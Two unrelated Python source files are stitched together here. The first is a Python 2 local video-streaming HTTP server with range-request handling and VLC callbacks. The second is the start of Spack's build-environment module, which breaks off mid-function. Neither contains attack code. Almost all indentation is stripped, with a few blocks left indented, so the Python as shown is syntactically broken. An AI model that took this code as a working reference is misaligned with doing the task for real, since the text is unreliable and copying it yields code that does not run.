def __init__(self, port):
if VideoHTTPServer.__single:
raise RuntimeError, 'HTTPServer is Singleton'
VideoHTTPServer.__single = self
self.port = port
if globalConfig.get_value('allow-non-local-client-connection'):
bind_address = ''
else:
bind_address = '127.0.0.1'
BaseHTTPServer.HTTPServer.__init__(self, (bind_address, self.port), SimpleServer)
self.daemon_threads = True
self.allow_reuse_address = True
self.lock = RLock()
self.urlpath2streaminfo = {}
self.mappers = []
self.errorcallback = None
self.statuscallback = None
def getInstance(*args, **kw):
if VideoHTTPServer.__single is None:
VideoHTTPServer(*args, **kw)
return VideoHTTPServer.__single
getInstance = staticmethod(getInstance)
def background_serve(self):
name = 'VideoHTTPServerThread-1'
self.thread2 = Thread(target=self.serve_forever, name=name)
self.thread2.setDaemon(True)
self.thread2.start()
def register(self, errorcallback, statuscallback):
self.errorcallback = errorcallback
self.statuscallback = statuscallback
def set_inputstream(self, streaminfo, urlpath):
self.lock.acquire()
if DEBUGLOCK:
log('videoserver::set_inputstream: urlpath', urlpath, 'streaminfo', streaminfo, 'thread', currentThread().getName())
if self.urlpath2streaminfo.has_key(urlpath):
if DEBUGLOCK:
log('videoserver::set_inputstream: path exists, delete old: urlpath', urlpath, 'thread', currentThread().getName())
self.del_inputstream(urlpath)
streaminfo['lock'] = RLock()
self.urlpath2streaminfo[urlpath] = streaminfo
self.lock.release()
def acquire_inputstream(self, urlpath):
global DEBUG
if urlpath is None:
return
streaminfo = None
for mapper in self.mappers:
streaminfo = mapper.get(urlpath)
if streaminfo is not None and (streaminfo['statuscode'] == 200 or streaminfo['statuscode'] == 301):
return streaminfo
self.lock.acquire()
if DEBUGLOCK:
log('VideoServer::acquire_inputstream: lock done', urlpath, currentThread().getName())
try:
streaminfo = self.urlpath2streaminfo.get(urlpath, None)
if DEBUG:
log('videoserver::acquire_inputstream: got streaminfo: urlpath', urlpath, 'streaminfo', streaminfo)
finally:
if DEBUGLOCK:
log('VideoServer::acquire_inputstream: unlock', urlpath, currentThread().getName())
self.lock.release()
if streaminfo is not None and 'lock' in streaminfo:
if DEBUGLOCK:
log('VideoServer::acquire_inputstream: lock stream: urlpath', urlpath, 'streaminfo', streaminfo, 'thread', currentThread().getName())
streaminfo['lock'].acquire()
if DEBUGLOCK:
log('VideoServer::acquire_inputstream: lock stream done: urlpath', urlpath, 'thread', currentThread().getName())
return streaminfo
def release_inputstream(self, urlpath):
if DEBUGLOCK:
log('VideoServer::release_inputstream: lock', urlpath, currentThread().getName())
self.lock.acquire()
try:
streaminfo = self.urlpath2streaminfo.get(urlpath, None)
finally:
if DEBUGLOCK:
log('VideoServer::release_inputstream: unlock', urlpath, currentThread().getName())
self.lock.release()
if streaminfo is not None and 'lock' in streaminfo:
if DEBUGLOCK:
log('VideoServer::release_inputstream: unlock stream: urlpath', urlpath, 'streaminfo', streaminfo, 'thread', currentThread().getName())
streaminfo['lock'].release()
def del_inputstream(self, urlpath):
if DEBUGLOCK:
log('VideoServer::del_inputstream: enter', urlpath)
streaminfo = self.acquire_inputstream(urlpath)
self.lock.acquire()
if DEBUGLOCK:
log('VideoServer::del_inputstream: lock', urlpath, currentThread().getName())
try:
del self.urlpath2streaminfo[urlpath]
except KeyError:
if DEBUGLOCK:
log('videoserver::del_inputstream: path not found: urlpath', urlpath)
finally:
if DEBUGLOCK:
log('VideoServer::del_inputstream: unlock', urlpath, currentThread().getName())
self.lock.release()
if streaminfo is not None and 'lock' in streaminfo:
if DEBUGLOCK:
log('VideoServer::del_inputstream: stream: unlock', urlpath, currentThread().getName())
streaminfo['lock'].release()
def get_port(self):
return self.port
def add_path_mapper(self, mapper):
self.mappers.append(mapper)
def shutdown(self):
if DEBUG:
print >> sys.stderr, 'videoserv: Shutting down HTTP'
self.socket.close()
def handle_error(self, request, client_address):
if DEBUGBASESERV:
print >> sys.stderr, 'VideoHTTPServer: handle_error', request, client_address
log_exc()
class SimpleServer(BaseHTTPServer.BaseHTTPRequestHandler):
RANGE_REQUESTS_ENABLED = True
def log_message(self, format, *args):
pass
def do_GET(self):
global DEBUG
try:
if self.path.startswith('/webUI'):
DEBUG = DEBUGWEBUI
else:
DEBUG = DEBUGCONTENT
if DEBUG:
log('videoserv: do_GET: Got request', self.path, self.headers.getheader('range'), currentThread().getName())
nbytes2send = None
nbyteswritten = 0
try:
streaminfo = self.server.acquire_inputstream(self.path)
except:
streaminfo = None
if self.request_version == 'HTTP/1.1':
self.protocol_version = 'HTTP/1.1'
try:
if streaminfo is None or 'statuscode' in streaminfo and streaminfo['statuscode'] != 200:
if streaminfo is None:
streaminfo = {'statuscode': 500,
'statusmsg': "Internal Server Error, couldn't find resource"}
if DEBUG:
log('videoserv: do_GET: Cannot serve request', streaminfo['statuscode'], currentThread().getName())
self.send_response(streaminfo['statuscode'])
if streaminfo['statuscode'] == 301:
self.send_header('Location', streaminfo['statusmsg'])
self.end_headers()
else:
self.send_header('Content-Type', 'text/plain')
self.send_header('Content-Length', len(streaminfo['statusmsg']))
self.end_headers()
self.wfile.write(streaminfo['statusmsg'])
return
mimetype = streaminfo['mimetype']
stream = streaminfo['stream']
length = streaminfo['length']
if 'blocksize' in streaminfo:
blocksize = streaminfo['blocksize']
else:
blocksize = 65536
if 'svc' in streaminfo:
svc = streaminfo['svc']
else:
svc = False
if DEBUG:
log('videoserv: do_GET: MIME type is', mimetype, 'length', length, 'blocksize', blocksize, currentThread().getName())
firstbyte = 0
if length is not None:
lastbyte = length - 1
else:
lastbyte = None
range = self.headers.getheader('range')
if self.RANGE_REQUESTS_ENABLED and length and range:
bad = False
type, seek = string.split(range, '=')
if seek.find(',') != -1:
bad = True
else:
firstbytestr, lastbytestr = string.split(seek, '-')
firstbyte = bytestr2int(firstbytestr)
lastbyte = bytestr2int(lastbytestr)
if length is None:
bad = True
elif firstbyte is None and lastbyte is None:
bad = True
elif firstbyte >= length:
bad = True
elif lastbyte >= length:
if firstbyte is None:
lastbyte = length - 1
else:
bad = True
if bad:
self.send_response(416)
if length is None:
crheader = 'bytes */*'
else:
crheader = 'bytes */' + str(length)
self.send_header('Content-Range', crheader)
self.end_headers()
return
if firstbyte is not None and lastbyte is None:
nbytes2send = length - firstbyte
lastbyte = length - 1
elif firstbyte is None and lastbyte is not None:
nbytes2send = lastbyte
firstbyte = length - lastbyte
lastbyte = length - 1
else:
nbytes2send = lastbyte + 1 - firstbyte
crheader = 'bytes ' + str(firstbyte) + '-' + str(lastbyte) + '/' + str(length)
if DEBUG:
log('VideoServer::do_Get: send response 206,', crheader)
self.send_response(206)
self.send_header('Content-Range', crheader)
else:
nbytes2send = length
self.send_response(200)
if DEBUG:
log('videoserv: do_GET: final range', firstbyte, lastbyte, nbytes2send, currentThread().getName())
if not svc:
try:
stream.seek(firstbyte)
except:
log_exc()
if self.request_version == 'HTTP/1.1':
self.send_header('Connection', 'Keep-Alive')
self.send_header('Keep-Alive', 'timeout=15, max=100')
self.send_header('Content-Type', mimetype)
self.send_header('Accept-Ranges', 'bytes')
try:
if streaminfo.has_key('bitrate') and streaminfo['bitrate'] is not None and length is not None:
bitrate = streaminfo['bitrate']
estduration = float(length) / float(bitrate)
self.send_header('X-Content-Duration', estduration)
except:
log_exc()
if length is not None:
self.send_header('Content-Length', nbytes2send)
else:
self.send_header('Transfer-Encoding', 'chunked')
self.end_headers()
if svc:
data = stream.read()
if len(data) > 0:
self.wfile.write(data)
elif len(data) == 0:
if DEBUG:
log('videoserv: svc: stream.read() no data')
else:
done = False
while True:
tt = time.time()
data = stream.read(blocksize)
data_len = len(data)
if data_len == 0:
done = True
tt = time.time() - tt
if DEBUG:
log('videoserver::get: read done: blocksize', blocksize, 'length', length, 'len(data)', data_len, 'time', tt, 'thread', currentThread().getName())
if length is None:
self.wfile.write('%x\r\n' % data_len)
if data_len > 0:
tt = time.time()
if length is not None and nbyteswritten + data_len > nbytes2send:
endlen = nbytes2send - nbyteswritten
if endlen != 0:
self.wfile.write(data[:endlen])
done = True
nbyteswritten += endlen
else:
try:
playback_started = stream.stream.mt.playback_started
bitrate = stream.stream.mt.videostatus.bitrate
except:
playback_started = False
bitrate = None
if bitrate is None:
try:
self.wfile.write(data)
except:
raise ConnectionResetError()
else:
delay = 0.01
speed = bitrate * 8
chunk_size = bitrate
pos = 0
while pos < data_len:
chunk = data[pos:pos + chunk_size]
try:
self.wfile.write(chunk)
except:
raise ConnectionResetError()
if DEBUG:
log('videoserver::get: write chunk: pos', pos, 'chunk_size', chunk_size, 'delay', delay, 'speed', speed, 'thread', currentThread().getName())
pos += chunk_size
nbyteswritten += data_len
if DEBUG:
log('videoserver::get: write done: nbyteswritten', nbyteswritten, 'time', time.time() - tt, 'thread', currentThread().getName())
if length is None:
self.wfile.write('\r\n')
if done:
if DEBUG:
log('videoserver::get: stream reached EOF: thread', currentThread().getName())
break
if DEBUG and nbyteswritten != nbytes2send:
log('videoserver::get: sent wrong amount: wanted', nbytes2send, 'got', nbyteswritten, 'thread', currentThread().getName())
if not range:
stream.close()
if self.server.statuscallback is not None:
self.server.statuscallback('Done')
except ConnectionResetError:
if DEBUG:
log('videoserver::get: connection reset')
except:
log_exc()
finally:
self.server.release_inputstream(self.path)
except socket.error as e2:
if DEBUG:
                log('videoserv: SocketError occurred while serving', currentThread().getName())
log_exc()
except Exception as e:
if DEBUG:
                log('videoserv: Error occurred while serving', currentThread().getName())
log_exc()
self.error(e, self.path)
def error(self, e, url):
if self.server.errorcallback is not None:
self.server.errorcallback(e, url)
else:
log_exc()
if self.server.statuscallback is not None:
self.server.statuscallback('Error playing video:' + str(e))
class VideoRawVLCServer():
__single = None
def __init__(self):
if VideoRawVLCServer.__single:
raise RuntimeError, 'VideoRawVLCServer is Singleton'
VideoRawVLCServer.__single = self
self.lock = RLock()
self.oldsid = None
self.sid2streaminfo = {}
def getInstance(*args, **kw):
if VideoRawVLCServer.__single is None:
VideoRawVLCServer(*args, **kw)
return VideoRawVLCServer.__single
getInstance = staticmethod(getInstance)
def set_inputstream(self, streaminfo, sid):
self.lock.acquire()
try:
print >> sys.stderr, 'VLCRawServer: setting sid', sid
self.sid2streaminfo[sid] = streaminfo
finally:
self.lock.release()
def get_inputstream(self, sid):
self.lock.acquire()
try:
return self.sid2streaminfo[sid]
finally:
self.lock.release()
def shutdown(self):
pass
def ReadDataCallback(self, bufc, buflen, sid):
try:
if self.oldsid is not None and self.oldsid != sid:
oldstream = self.sid2streaminfo[self.oldsid]['stream']
del self.sid2streaminfo[self.oldsid]
try:
oldstream.close()
except:
log_exc()
self.oldsid = sid
streaminfo = self.get_inputstream(sid)
data = streaminfo['stream'].read(buflen)
size = len(data)
if size == 0:
return 0
bufc[0:size] = data
return size
except:
log_exc()
return -1
    def SeekDataCallback(self, pos, sid):
        try:
            streaminfo = self.get_inputstream(sid)
            streaminfo['stream'].seek(pos, os.SEEK_SET)
            return 0
        except:
            log_exc()
            return -1
class MultiHTTPServer(ThreadingMixIn, VideoHTTPServer):
__single = None
def __init__(self, port):
if MultiHTTPServer.__single:
raise RuntimeError, 'MultiHTTPServer is Singleton'
MultiHTTPServer.__single = self
self.port = port
BaseHTTPServer.HTTPServer.__init__(self, ('127.0.0.1', self.port), SimpleServer)
self.daemon_threads = True
self.allow_reuse_address = True
self.lock = RLock()
self.urlpath2streaminfo = {}
self.mappers = []
self.errorcallback = None
self.statuscallback = None
def background_serve(self):
name = 'MultiHTTPServerThread-1'
self.thread2 = Thread(target=self.serve_forever, name=name)
self.thread2.setDaemon(True)
self.thread2.start()
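# Usage sketch (illustrative only; the port and paths are examples): the
# singleton servers above are typically wired up as
#
#     server = VideoHTTPServer.getInstance(6878)
#     server.register(errorcallback=None, statuscallback=None)
#     server.background_serve()
#     server.set_inputstream({'mimetype': 'video/mp4',
#                             'stream': open('movie.mp4', 'rb'),
#                             'length': None}, '/content')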
|
build_environment.py
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
   the package's module scope. This allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import re
import inspect
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
from llnl.util.lang import dedupe
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.schema.environment
import spack.store
import spack.architecture as arch
from spack.util.string import plural
from spack.util.environment import (
env_flag, filter_system_paths, get_path, is_system_path,
EnvironmentModifications, validate, preserve_environment)
from spack.util.environment import system_dirs
from spack.error import NoLibrariesError, NoHeadersError
from spack.util.executable import Executable
from spack.util.module_cmd import load_module, get_path_from_module, module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'
#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
SPACK_INCLUDE_DIRS = 'SPACK_INCLUDE_DIRS'
SPACK_LINK_DIRS = 'SPACK_LINK_DIRS'
SPACK_RPATH_DIRS = 'SPACK_RPATH_DIRS'
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
SPACK_DEBUG = 'SPACK_DEBUG'
SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'
# Platform-specific library suffix.
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
"""Special callable executable object for make so the user can specify
parallelism options on a per-invocation basis. Specifying
'parallel' to the call will override whatever the package's
global setting is, so you can either default to true or false and
override particular calls. Specifying 'jobs_env' to a particular
call will name an environment variable which will be set to the
parallelism level (without affecting the normal invocation with
-j).
Note that if the SPACK_NO_PARALLEL_MAKE env var is set it overrides
everything.
"""
def __init__(self, name, jobs):
super(MakeExecutable, self).__init__(name)
self.jobs = jobs
def __call__(self, *args, **kwargs):
"""parallel, and jobs_env from kwargs are swallowed and used here;
remaining arguments are passed through to the superclass.
"""
disable = env_flag(SPACK_NO_PARALLEL_MAKE)
parallel = (not disable) and kwargs.pop('parallel', self.jobs > 1)
if parallel:
args = ('-j{0}'.format(self.jobs),) + args
jobs_env = kwargs.pop('jobs_env', None)
if jobs_env:
# Caller wants us to set an environment variable to
# control the parallelism.
kwargs['extra_env'] = {jobs_env: str(self.jobs)}
return super(MakeExecutable, self).__call__(*args, **kwargs)
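# Usage sketch (illustrative only; the environment variable name is just an example):
#
#     make = MakeExecutable('make', 8)
#     make('install', parallel=False)       # force a serial invocation
#     make('check', jobs_env='TEST_JOBS')   # also export the job count as TEST_JOBS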
def clean_environment():
# Stuff in here sanitizes the build environment to eliminate
# anything the user has set that may interfere. We apply it immediately
# unlike the other functions so it doesn't overwrite what the modules load.
env = EnvironmentModifications()
# Remove these vars from the environment during build because they
# can affect how some packages find libraries. We want to make
# sure that builds never pull in unintended external dependencies.
env.unset('LD_LIBRARY_PATH')
env.unset('LIBRARY_PATH')
env.unset('CPATH')
env.unset('LD_RUN_PATH')
env.unset('DYLD_LIBRARY_PATH')
env.unset('DYLD_FALLBACK_LIBRARY_PATH')
# On Cray "cluster" systems, unset CRAY_LD_LIBRARY_PATH to avoid
# interference with Spack dependencies.
# CNL requires these variables to be set (or at least some of them,
# depending on the CNL version).
hostarch = arch.Arch(arch.platform(), 'default_os', 'default_target')
on_cray = str(hostarch.platform) == 'cray'
using_cnl = re.match(r'cnl\d+', str(hostarch.os))
if on_cray and not using_cnl:
env.unset('CRAY_LD_LIBRARY_PATH')
for varname in os.environ.keys():
if 'PKGCONF' in varname:
env.unset(varname)
# Unset the following variables because they can affect installation of
# Autotools and CMake packages.
build_system_vars = [
'CC', 'CFLAGS', 'CPP', 'CPPFLAGS', # C variables
'CXX', 'CCC', 'CXXFLAGS', 'CXXCPP', # C++ variables
'F77', 'FFLAGS', 'FLIBS', # Fortran77 variables
'FC', 'FCFLAGS', 'FCLIBS', # Fortran variables
'LDFLAGS', 'LIBS' # linker variables
]
for v in build_system_vars:
env.unset(v)
# Unset mpi environment vars. These flags should only be set by
# mpi providers for packages with mpi dependencies
mpi_vars = [
'MPICC', 'MPICXX', 'MPIFC', 'MPIF77', 'MPIF90'
]
for v in mpi_vars:
env.unset(v)
build_lang = spack.config.get('config:build_language')
if build_lang:
# Override language-related variables. This can be used to force
# English compiler messages etc., which allows parse_log_events to
# show useful matches.
env.set('LC_ALL', build_lang)
# Remove any macports installs from the PATH. The macports ld can
# cause conflicts with the built-in linker on el capitan. Solves
# assembler issues, e.g.:
# suffix or operands invalid for `movq'"
path = get_path('PATH')
for p in path:
if '/macports/' in p:
env.remove_path('PATH', p)
env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
assert pkg.spec.concrete
compiler = pkg.compiler
spec = pkg.spec
# Make sure the executables for this compiler exist
compiler.verify_executables()
# Set compiler variables used by CMake and autotools
assert all(key in compiler.link_paths for key in (
'cc', 'cxx', 'f77', 'fc'))
# Populate an object with the list of environment modifications
# and return it
# TODO : add additional kwargs for better diagnostics, like requestor,
# ttyout, ttyerr, etc.
link_dir = spack.paths.build_env_path
# Set SPACK compiler variables so that our wrapper knows what to call
if compiler.cc:
env.set('SPACK_CC', compiler.cc)
env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
if compiler.cxx:
env.set('SPACK_CXX', compiler.cxx)
env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
if compiler.f77:
env.set('SPACK_F77', compiler.f77)
env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
if compiler.fc:
env.set('SPACK_FC', compiler.fc)
env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))
# Set SPACK compiler rpath flags so that our wrapper knows what to use
env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
env.set('SPACK_LINKER_ARG', compiler.linker_arg)
# Check whether we want to force RPATH or RUNPATH
if spack.config.get('config:shared_linking') == 'rpath':
env.set('SPACK_DTAGS_TO_STRIP', compiler.enable_new_dtags)
env.set('SPACK_DTAGS_TO_ADD', compiler.disable_new_dtags)
else:
env.set('SPACK_DTAGS_TO_STRIP', compiler.disable_new_dtags)
env.set('SPACK_DTAGS_TO_ADD', compiler.enable_new_dtags)
# Set the target parameters that the compiler will add
isa_arg = spec.architecture.target.optimization_flags(compiler)
env.set('SPACK_TARGET_ARGS', isa_arg)
# Trap spack-tracked compiler flags as appropriate.
# env_flags are easy to accidentally override.
inject_flags = {}
env_flags = {}
build_system_flags = {}
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Always convert flag_handler to function type.
        # This avoids discrepancies in calling conventions between functions
# and methods, or between bound and unbound methods in python 2.
# We cannot effectively convert everything to a bound method, which
# would be the simpler solution.
if isinstance(pkg.flag_handler, types.FunctionType):
handler = pkg.flag_handler
else:
if sys.version_info >= (3, 0):
handler = pkg.flag_handler.__func__
else:
handler = pkg.flag_handler.im_func
injf, envf, bsf = handler(pkg, flag, spec.compiler_flags[flag])
inject_flags[flag] = injf or []
env_flags[flag] = envf or []
build_system_flags[flag] = bsf or []
# Place compiler flags as specified by flag_handler
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Concreteness guarantees key safety here
if inject_flags[flag]:
# variables SPACK_<FLAG> inject flags through wrapper
var_name = 'SPACK_{0}'.format(flag.upper())
env.set(var_name, ' '.join(f for f in inject_flags[flag]))
if env_flags[flag]:
# implicit variables
env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
pkg.flags_to_build_system_args(build_system_flags)
env.set('SPACK_COMPILER_SPEC', str(spec.compiler))
env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))
compiler.setup_custom_environment(pkg, env)
return env
def set_build_environment_variables(pkg, env, dirty):
"""Ensure a clean install environment when we build packages.
This involves unsetting pesky environment variables that may
affect the build. It also involves setting environment variables
used by Spack's compiler wrappers.
Args:
pkg: The package we are building
env: The build environment
dirty (bool): Skip unsetting the user's environment settings
"""
# Gather information about various types of dependencies
build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
build_link_deps = build_deps | link_deps
rpath_deps = get_rpath_deps(pkg)
link_dirs = []
include_dirs = []
rpath_dirs = []
# The top-level package is always RPATHed. It hasn't been installed yet
# so the RPATHs are added unconditionally (e.g. even though lib64/ may
# not be created for the install).
for libdir in ['lib', 'lib64']:
lib_path = os.path.join(pkg.prefix, libdir)
rpath_dirs.append(lib_path)
# Set up link, include, RPATH directories that are passed to the
# compiler wrapper
for dep in link_deps:
if is_system_path(dep.prefix):
continue
query = pkg.spec[dep.name]
dep_link_dirs = list()
try:
dep_link_dirs.extend(query.libs.directories)
except NoLibrariesError:
tty.debug("No libraries found for {0}".format(dep.name))
for default_lib_dir in ['lib', 'lib64']:
default_lib_prefix = os.path.join(dep.prefix, default_lib_dir)
if os.path.isdir(default_lib_prefix):
dep_link_dirs.append(default_lib_prefix)
link_dirs.extend(dep_link_dirs)
if dep in rpath_deps:
rpath_dirs.extend(dep_link_dirs)
try:
include_dirs.extend(query.headers.directories)
except NoHeadersError:
tty.debug("No headers found for {0}".format(dep.name))
link_dirs = list(dedupe(filter_system_paths(link_dirs)))
include_dirs = list(dedupe(filter_system_paths(include_dirs)))
rpath_dirs = list(dedupe(filter_system_paths(rpath_dirs)))
env.set(SPACK_LINK_DIRS, ':'.join(link_dirs))
env.set(SPACK_INCLUDE_DIRS, ':'.join(include_dirs))
env.set(SPACK_RPATH_DIRS, ':'.join(rpath_dirs))
build_prefixes = [dep.prefix for dep in build_deps]
build_link_prefixes = [dep.prefix for dep in build_link_deps]
# add run-time dependencies of direct build-time dependencies:
for build_dep in build_deps:
for run_dep in build_dep.traverse(deptype='run'):
build_prefixes.append(run_dep.prefix)
# Filter out system paths: ['/', '/usr', '/usr/local']
# These paths can be introduced into the build when an external package
# is added as a dependency. The problem with these paths is that they often
# contain hundreds of other packages installed in the same directory.
# If these paths come first, they can overshadow Spack installations.
build_prefixes = filter_system_paths(build_prefixes)
build_link_prefixes = filter_system_paths(build_link_prefixes)
# Add dependencies to CMAKE_PREFIX_PATH
env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)
# Set environment variables if specified for
# the given compiler
compiler = pkg.compiler
env.extend(spack.schema.environment.parse(compiler.environment))
if compiler.extra_rpaths:
extra_rpaths = ':'.join(compiler.extra_rpaths)
env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)
# Add bin directories from dependencies to the PATH for the build.
for prefix in build_prefixes:
for dirname in ['bin', 'bin64']:
bin_dir = os.path.join(prefix, dirname)
if os.path.isdir(bin_dir):
env.prepend_path('PATH', bin_dir)
# Add spack build environment path with compiler wrappers first in
# the path. We add the compiler wrapper path, which includes default
# wrappers (cc, c++, f77, f90), AND a subdirectory containing
# compiler-specific symlinks. The latter ensures that builds that
# are sensitive to the *name* of the compiler see the right name when
# we're building with the wrappers.
#
# Conflicts on case-insensitive systems (like "CC" and "cc") are
# handled by putting one in the <build_env_path>/case-insensitive
# directory. Add that to the path too.
env_paths = []
compiler_specific = os.path.join(
spack.paths.build_env_path, pkg.compiler.name)
for item in [spack.paths.build_env_path, compiler_specific]:
env_paths.append(item)
ci = os.path.join(item, 'case-insensitive')
if os.path.isdir(ci):
env_paths.append(ci)
for item in env_paths:
env.prepend_path('PATH', item)
env.set_path(SPACK_ENV_PATH, env_paths)
# Working directory for the spack command itself, for debug logs.
if spack.config.get('config:debug'):
env.set(SPACK_DEBUG, 'TRUE')
env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('{name}-{hash:7}'))
env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)
# Find ccache binary and hand it to build environment
if spack.config.get('config:ccache'):
ccache = Executable('ccache')
if not ccache:
raise RuntimeError("No ccache binary found in PATH")
env.set(SPACK_CCACHE_BINARY, ccache)
# Add any pkgconfig directories to PKG_CONFIG_PATH
for prefix in build_link_prefixes:
for directory in ('lib', 'lib64', 'share'):
pcdir = os.path.join(prefix, directory, 'pkgconfig')
if os.path.isdir(pcdir):
env.prepend_path('PKG_CONFIG_PATH', pcdir)
return env
def _set_variables_for_single_module(pkg, module):
"""Helper function to set module variables for single module."""
# Put a marker on this module so that it won't execute the body of this
# function again, since it is not needed
marker = '_set_run_already_called'
if getattr(module, marker, False):
return
jobs = spack.config.get('config:build_jobs', 16) if pkg.parallel else 1
jobs = min(jobs, multiprocessing.cpu_count())
assert jobs is not None, "no default set for config:build_jobs"
m = module
m.make_jobs = jobs
# TODO: make these build deps that can be installed if not found.
m.make = MakeExecutable('make', jobs)
m.gmake = MakeExecutable('gmake', jobs)
m.scons = MakeExecutable('scons', jobs)
m.ninja = MakeExecutable('ninja', jobs)
# easy shortcut to os.environ
m.env = os.environ
# Find the configure script in the archive path
# Don't use which for this; we want to find it in the current dir.
m.configure = Executable('./configure')
m.meson = Executable('meson')
m.cmake = Executable('cmake')
m.ctest = MakeExecutable('ctest', jobs)
# Standard CMake arguments
m.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
m.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)
# Put spack compiler paths in module scope.
link_dir = spack.paths.build_env_path
m.spack_cc = os.path.join(link_dir, pkg.compiler.link_paths['cc'])
m.spack_cxx = os.path.join(link_dir, pkg.compiler.link_paths['cxx'])
m.spack_f77 = os.path.join(link_dir, pkg.compiler.link_paths['f77'])
m.spack_fc = os.path.join(link_dir, pkg.compiler.link_paths['fc'])
# Emulate some shell commands for convenience
m.pwd = os.getcwd
m.cd = os.chdir
m.mkdir = os.mkdir
m.makedirs = os.makedirs
m.remove = os.remove
m.removedirs = os.removedirs
m.symlink = os.symlink
m.mkdirp = mkdirp
m.install = install
m.install_tree = install_tree
m.rmtree = shutil.rmtree
m.move = shutil.move
# Useful directories within the prefix are encapsulated in
# a Prefix object.
m.prefix = pkg.prefix
# Platform-specific library suffix.
m.dso_suffix = dso_suffix
def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
compiler_path = kwargs.get('compiler', m.spack_cc)
compiler = Executable(compiler_path)
return _static_to_shared_library(pkg.spec.architecture, compiler,
static_lib, shared_lib, **kwargs)
m.static_to_shared_library = static_to_shared_library
# Put a marker on this module so that it won't execute the body of this
# function again, since it is not needed
setattr(m, marker, True)
def set_module_variables_for_package(pkg):
"""Populate the module scope of install() with some useful functions.
This makes things easier for package writers.
"""
# If a user makes their own package repo, e.g.
# spack.pkg.mystuff.libelf.Libelf, and they inherit from an existing class
# like spack.pkg.original.libelf.Libelf, then set the module variables
# for both classes so the parent class can still use them if it gets
# called. parent_class_modules includes pkg.module.
modules = parent_class_modules(pkg.__class__)
for mod in modules:
_set_variables_for_single_module(pkg, mod)
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
**kwargs):
"""
Converts a static library to a shared library. The static library has to
be built with PIC for the conversion to work.
Parameters:
static_lib (str): Path to the static library.
shared_lib (str): Path to the shared library. Default is to derive
from the static library's path.
Keyword arguments:
compiler (str): Path to the compiler. Default is spack_cc.
compiler_output: Where to print compiler output to.
arguments (str list): Additional arguments for the compiler.
version (str): Library version. Default is unspecified.
compat_version (str): Library compatibility version. Default is
version.
"""
compiler_output = kwargs.get('compiler_output', None)
arguments = kwargs.get('arguments', [])
version = kwargs.get('version', None)
compat_version = kwargs.get('compat_version', version)
if not shared_lib:
shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
dso_suffix)
compiler_args = []
# TODO: Compiler arguments should not be hardcoded but provided by
# the different compiler classes.
if 'linux' in arch or 'cray' in arch:
soname = os.path.basename(shared_lib)
if compat_version:
soname += '.{0}'.format(compat_version)
compiler_args = [
'-shared',
'-Wl,-soname,{0}'.format(soname),
'-Wl,--whole-archive',
static_lib,
'-Wl,--no-whole-archive'
]
elif 'darwin' in arch:
install_name = shared_lib
if compat_version:
install_name += '.{0}'.format(compat_version)
compiler_args = [
'-dynamiclib',
'-install_name', '{0}'.format(install_name),
'-Wl,-force_load,{0}'.format(static_lib)
]
if compat_version:
compiler_args.extend(['-compatibility_version', '{0}'.format(
compat_version)])
if version:
compiler_args.extend(['-current_version', '{0}'.format(version)])
if len(arguments) > 0:
